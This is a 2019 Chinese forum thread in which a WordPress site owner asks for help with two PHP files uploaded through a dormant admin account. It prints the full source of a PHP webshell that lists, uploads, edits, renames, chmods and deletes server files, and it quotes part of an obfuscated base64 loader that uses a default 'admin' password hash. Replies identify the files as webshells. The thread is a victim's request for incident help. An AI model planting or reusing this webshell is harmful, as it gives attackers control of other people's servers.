网站附件里被人塞进来两个php，求大佬看看有啥威胁

刘贾宜 · 发表于 2019-5-4 23:01:32

本帖最后由刘贾宜于 2019-5-4 23:25 编辑

求问大佬们现在该怎么办，那两个文件已经删了，还需要做什么啊
————————————
不废话直接贴上来了

一个文件发不出来上传附件了

(27.87 KB, 下载次数: 111)

2019-5-4 23:01 上传
点击文件名下载附件

[ol]

$value){

$_POST[$key] = stripslashes($value);

}

echo '

Webshell

body{

font-family: "Racing Sans One", cursive;

background-color: #e6e6e6;

text-shadow:0px 0px 1px #757575;

}

#content tr:hover{

background-color: #636263;

text-shadow:0px 0px 10px #fff;

}

#content .first{

background-color: silver;

}

#content .first:hover{

background-color: silver;

text-shadow:0px 0px 1px #757575;

}

table{

border: 1px #000000 dotted;

}

H1{

font-family: "Rye", cursive;

}

a{

color: #000;

text-decoration: none;

}

a:hover{

color: #fff;

text-shadow:0px 0px 10px #ffffff;

}

input,select,textarea{

border: 1px #000000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

[B]

[tr][td]Current Path : ';

if(isset($_GET['path'])){

$path = $_GET['path'];

}else{

$path = getcwd();

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

foreach($paths as $id=>$pat){

if($pat == '' && $id == 0){

$a = true;

echo '[url=]/[/url]';

continue;

}

if($pat == '') continue;

echo '[url=]

for($i=0;$i'.$pat.'[/url]/';

}

echo '[/td][/tr][tr][td]';

if(isset($_FILES['file'])){

if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

echo '
File Upload Done.
';

}else{

echo '
File Upload Error.
';

}

echo '
'.php_uname().'

';

echo '

Upload File :

[/td][/tr]';

if(isset($_GET['filesrc'])){

echo "[tr][td]Current File : ";

echo $_GET['filesrc'];

echo '[/tr][/td][/table]
';

echo(''.htmlspecialchars(file_get_contents($_GET['filesrc'])).'');

}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

echo '[/table]
'.$_POST['path'].'
';

if($_POST['opt'] == 'chmod'){

if(isset($_POST['perm'])){

if(chmod($_POST['path'],$_POST['perm'])){

echo '
Change Permission Done.
';

}else{

echo '
Change Permission Error.
';

}

echo '

Permission :

';

}elseif($_POST['opt'] == 'rename'){

if(isset($_POST['newname'])){

if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

echo '
Change Name Done.
';

}else{

echo '
Change Name Error.
';

}

$_POST['name'] = $_POST['newname'];

}

echo '

New Name :

';

}elseif($_POST['opt'] == 'edit'){

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '
Edit File Done.
';

}else{

echo '
Edit File Error.
';

}

fclose($fp);

}

echo '

'.htmlspecialchars(file_get_contents($_POST['path'])).'

';

}

echo '';

}else{

echo '[/table]
';

if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

if($_POST['type'] == 'dir'){

if(rmdir($_POST['path'])){

echo '
Delete Dir Done.
';

}else{

echo '
Delete Dir Error.
';

}

}elseif($_POST['type'] == 'file'){

if(unlink($_POST['path'])){

echo '
Delete File Done.
';

}else{

echo '
Delete File Error.
';

}

echo '';

$scandir = scandir($path);

echo '

Name

Size

Permissions

Options

';

foreach($scandir as $dir){

if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

echo "

[url=]$dir[/url]

--

";

if(is_writable("$path/$dir")) echo '';

elseif(!is_readable("$path/$dir")) echo '';

echo perms("$path/$dir");

if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '';

echo "

Delete

Chmod

Rename

" />

";

}

echo '';

foreach($scandir as $file){

if(!is_file("$path/$file")) continue;

$size = filesize("$path/$file")/1024;

$size = round($size,3);

if($size >= 1024){

$size = round($size/1024,2).' MB';

}else{

$size = $size.' KB';

}

echo "

[url=]$file[/url]

".$size."

";

if(is_writable("$path/$file")) echo '';

elseif(!is_readable("$path/$file")) echo '';

echo perms("$path/$file");

if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '';

echo "

Delete

Chmod

Rename

Edit

" />

";

}

echo '

';

}

echo '

[/B]

';

function perms($file){

$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {

// Socket

$info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link

$info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

// Regular

$info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

// Block special

$info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

// Directory

$info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

// Character special

$info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

// FIFO pipe

$info = 'p';

} else {

// Unknown

$info = 'u';

}

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

(($perms & 0x0800) ? 's' : 'x' ) :

(($perms & 0x0800) ? 'S' : '-'));

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

(($perms & 0x0400) ? 's' : 'x' ) :

(($perms & 0x0400) ? 'S' : '-'));

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

(($perms & 0x0200) ? 't' : 'x' ) :

(($perms & 0x0200) ? 'T' : '-'));

return $info;

}

?>[/ol]复制代码

miven · 发表于 2019-5-4 23:17:52

webshell啊

刘贾宜 · 发表于 2019-5-4 23:04:08

本帖最后由刘贾宜于 2019-5-4 23:24 编辑

附件里的文件开头是这样的

[ol]

'')).'/');[/ol]复制代码

剩下就是一大堆乱码了
$pBVzO57KOVp='ID8+PD9waHAgZnVuY3Rpb24gc3RyZGlyKCRzdHIpIHsgcmV。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

fatal · 发表于 2019-5-4 23:10:04

大佬wordpress？

宁静致远 · 发表于 2019-5-4 23:11:54

你的算好的，我的被塞的文件更**，都是菜刀。

刘贾宜 · 发表于 2019-5-4 23:13:32

fatal 发表于 2019-5-4 23:10

大佬wordpress？
wordpress 一个常年不用的管理员账号上传的。。。

OpenSSL · 发表于 2019-5-4 23:10:00

define('PASSWD','21232f297a57a5a743894a0e4a801fc3');/*默认是admin，MD5加密方式*/

应该是PHP马了

fatal · 发表于 2019-5-4 23:14:45

刘贾宜发表于 2019-5-4 23:13

wordpress 一个常年不用的管理员账号上传的。。。
请教一下它利用什么漏洞赛进来的？大佬是怎么突然发现的

刘贾宜 · 发表于 2019-5-4 23:18:08

fatal 发表于 2019-5-4 23:18

请教一下它利用什么漏洞赛进来的？大佬是怎么突然发现的
上传文件的时候突然发现媒体库里面有两个php

是一个管理员账号上传的，目测可能是爆破了管理员的密码然后上传的

Tracertfatal · 发表于 2019-5-4 23:13:00

现在木马这么猖獗啊
刘贾宜发表于 2019-5-4 23:23

上传文件的时候突然发现媒体库里面有两个php
是一个管理员账号上传的，目测可能是爆破了管理员的密码 ...
我嚓。。。现在塞马那么猖獗啊

瑟瑟发抖

		自动登录	找回密码
密码			立即注册

网站附件里被人塞进来两个php，求大佬看看有啥威胁

本帖子中包含更多资源